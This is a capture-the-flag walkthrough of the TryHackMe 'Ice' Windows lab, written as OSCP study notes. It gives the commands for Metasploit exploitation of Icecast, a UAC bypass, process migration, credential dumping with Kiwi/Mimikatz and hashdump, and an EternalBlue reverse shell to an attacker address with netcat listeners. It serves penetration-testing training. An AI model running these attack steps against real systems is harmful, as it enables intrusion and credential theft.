TryHackMe- Ice Walkthrough

INTRODUCTION

In this walkthrough, i will be solving TryHackMe: Ice.Please NOTE that this is a small writeup as i will directly be exploiting and gaining admin access on the machine and i wont be answering all small QnA Type questions asked while solving the box as i have written this blog only as a part of note keeping.If you want a detailed explaination i would highly suggest you to check out- https://youtu.be/Wc7NVl-wNXI OR search Ratiros01 ice walkthrough since all images i have used here have been taken from the walkthrough of Ratiros01 as a part of note keeping for my OSCP exam and i had a poor connection on the day of writing this walkthrough so i decided to make a small note of the writeup of Ratiros01.

SO LETS BEGIN. . .

We do a no ping(-Pn) and SYN(-sS)scan on our target ip and use (-A) for agressive scanning which detects OS and version.

On port 8000 we see a wierd service called “IceCast” running

We note that beside 445/Tcp it shows”Windows 7 professional service pack” which means it is running on windows 7 which is infamous for the Eternal Blue Vulnerablity.There is also a user called DARK-PC.

Lets try to exploit icecast service using metasploit…So open it and use the command- “search icecast” and you will be greeted with the explot.

Type- “use 0” to select the exploit and >“show options”>set RHOST “targetip”>set LPORT 8000 (lport will be same as icecast service is runnin on port 8000) > explot

VOLIA !!! we have gained a meterpreter shell and now we can run commands to know more about our target machine such as- sysinfo / whoami / ps

we note that we are not still the admin(NT-Authority) user and merely the user called DARK and we can try running the command “getsystem” to privilege escalate but it fails…

So . . .lets try to use windows exploit suggester

run post/multi/recon/local_exploit_suggester

so we get a nice number of exploits for privilege escalation and lets use the one hilighted(eventvwer), to do so lets go to our previous session in metasploit and background it by using “background” command and then typing “sessions” to see our active sessions

use exploit/windows/local/bypassuac_eventvwr
show options

we see a option called SESSIONS so lets set the session for this exploit as 1 to refer our previous session(the shell received through exploiting icecast service)

Now lets run it by using the command “run” and we will see the exploit fails..so lets type ”show options” again and this time we see we have 2 more options-LHOST AND LPORT. just set the Lport to your ip address (to check your ip address use — ip addr and u will see an interface called “tun0" )

set the options correctly and run “exploit” and after the completion of the exploit, a new session will be created.run the command> “sessions” and set the session respectively by using “sessions 2”(in this case its session 2)

now after u are in session 1 and run the command “getprivs” you will see many more privileges are open.

LOOTING -we need to move to a process that has permission to interact with Isass service which is responsible for authenticating within windows, we run the command “ps” to see the processes run by NT AUTHORITY SYSTEM

In order to interact with lsass we need to be ‘living in’ a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this.

Do Read This amazing post to understand how Process Migration Actually works-https://security.stackexchange.com/questions/90578/how-does-process-migration-work-in-meterpreter

migrate -N spoolsv.exe

Now we have migrated to the process and when we run the command “getuid” we see that we have admin permissions !!!

GREAT !!! Now we can run Kiwi which is a updated version of Mimikatz a popular password dumping tool.Run the command > “load kiwi” and then “help” to see all options which this tool provides us…

Now you can also try using hashdump to dump all the hashes of the system and crack it as well or use RDP to see what our target is doing in realtime.

OTHER WAYS TO EXPLOIT- ETERNAL BLUE !!!

You can also try exploiting ETERNAL BLUE using this github repo

For usage u can visit the github repo or see the images shared below:

python eternalblue_checker.py <ip>
cd shellcode./shell_prep.sh
1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
2. LHOST : <attacker ip>
3. LPORT x64 : 8888
4. LPORT x86 : 9999
5. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
6. Type 0 to generate a staged payload or 1 to generate a stageless payload : 1
1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y2. LHOST : <attacker ip>3. LPORT x64 : 88884. LPORT x86 : 99995. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 16. Type 0 to generate a staged payload or 1 to generate a stageless payload : 1

SO once it’s done we create our listeners

nc -lvp 8888nc -lvp 9999

Lets Run The exploit now. . .

python eternalblue_exploit7.py <ip> shellcode/sc_all.bin

We see that we have received a connection on netcat and after typing “whoami” it shows NT AUTHORITY which means we are Admin

EXTRA CREDITS: (MANNUAL EXPLOITATION)

i would HIGHLY suggest you complete the Extra credits part of this machine.It was mainly done using this exploit…

a bit of changes have to be made to the shellcode and we also use certutil to move around files from our attacking machine to windows.In case you need any help regarding this, DO check out this separate Mannual Walkthrough Video by Hackersploit(LINK-https://www.youtube.com/watch?v=eIy69zUfbgI) and this writeup by Ratiros01(https://ratiros01.medium.com/tryhackme-ice-d26eaed6f090) who have done a good work of explaining it in depth.Also do learn how to convert metasploit modules to python exploit.

THANKS FOR READING THIS,WALKTHROUGH OF ICE…I’ll try covering more boxes in the future.

-ZEUS

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube